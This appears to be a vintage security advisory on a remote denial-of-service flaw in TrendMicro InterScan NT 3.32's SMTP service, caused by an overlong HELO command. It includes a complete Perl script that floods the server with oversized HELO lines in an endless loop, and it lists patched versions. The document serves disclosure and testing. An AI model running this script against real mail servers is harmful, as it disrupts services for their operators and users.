COMMAND

    Interscan

SYSTEMS AFFECTED

    Interscan NT/3.32

PROBLEM

    During  a  audit,  Alain  Thivillon   found  a  new  remote DOS on
    TrendMicro Interscan for  NT (last version  V3.32, build 1011  and
    1022).  Last  October, USSR Labs  found a buffer  overflow in HELO
    command, and  wrote a  very nice  exploit with  shell code, giving
    SYSTEM shell  access to  remote attacker.   Trendmicro closed  the
    hole, unfortunatly the patch was  not complete: by sending a  HELO
    followed by exactly  4075 to 4090  characters, SMTP tasks  crashes
    immediatly.   Depending  of  your  current  installed NT Debugger,
    this  crash  can  stop  all  other  SMTP  Threads  (if DRWatson is
    called)  or  just  reduce  number  of  remaining  incoming threads
    (default value is 25).

    Below is  a perl  script you  can use  to test  your vulnerabilty,
    Nessus version scheduled for today will include a NASL script.

    #!/usr/bin/perl

    # (c) Alain Thivillon & Stephane Aubert
    #     Herve Schauer Consultants 2000
    #     http://www.hsc.fr/
    #
    #     Do not use this stuff against Microsoft MX hosts :)
    #
    # Crash Interscan SMTP Server on Windows NT Version 3.32 Builds 1011 and 1022
    # Depending of debugger installed on NT, crash can be immediat if you use
    # Drwatson.32.exe (new connections get stuck), or can be limited to single
    # thread if Auto=0 in NT Debug key. Interscan limits number of running
    # threads (default 25) so it' very easy to exhaust all threads and finally
    # force answer to '452 Too Busy'

    use Socket;
    use FileHandle;

    $vict=$ARGV[0];

    $AF_INET = 2;
    $SOCK_STREAM = 1;
    $port=25;
    $sockaddr = 'S n a4 x8';

    ($name, $aliases, $type, $len, $thataddr) = gethostbyname($vict);
    $that = pack($sockaddr, $AF_INET, $port, $thataddr);

    while (1) {
      $mysock=new FileHandle;
      socket($mysock, $AF_INET, $SOCK_STREAM, $proto) || die "socket failed\n";
      connect($mysock, $that) || die "Connect failed\n";
      select($mysock); $| = 1; select(STDOUT); $| = 1;

      $line = <$mysock>;
      print $line;
      print $mysock "HELO ",'a'x4075,"\r\n";
      $line = <$mysock>;
      print $line;
      close $mysock;
    }

SOLUTION

    The  DOS  exploit  outlined  by  Alain  Thivillon  above  has been
    addressed  in  Trend  Micro's  InterScan  v.  3.4 for Windows NT -
    which is currently in beta test at time of writing.  The new  beta
    release can be downloaded from:

        http://www.antivirus.com/download/beta_programs/

    If you do not want to use the beta version, and you are  concerned
    about the DOS issues, you can download version InterScan v.  3.25.
    You need  to contact  your Trend  Micro support  representative to
    get the 3.25 release.   Version 3.25 lacks a  few of the  features
    of version 3.32 - but is  also is not subject to the  DOS exploits
    found in version 3.32.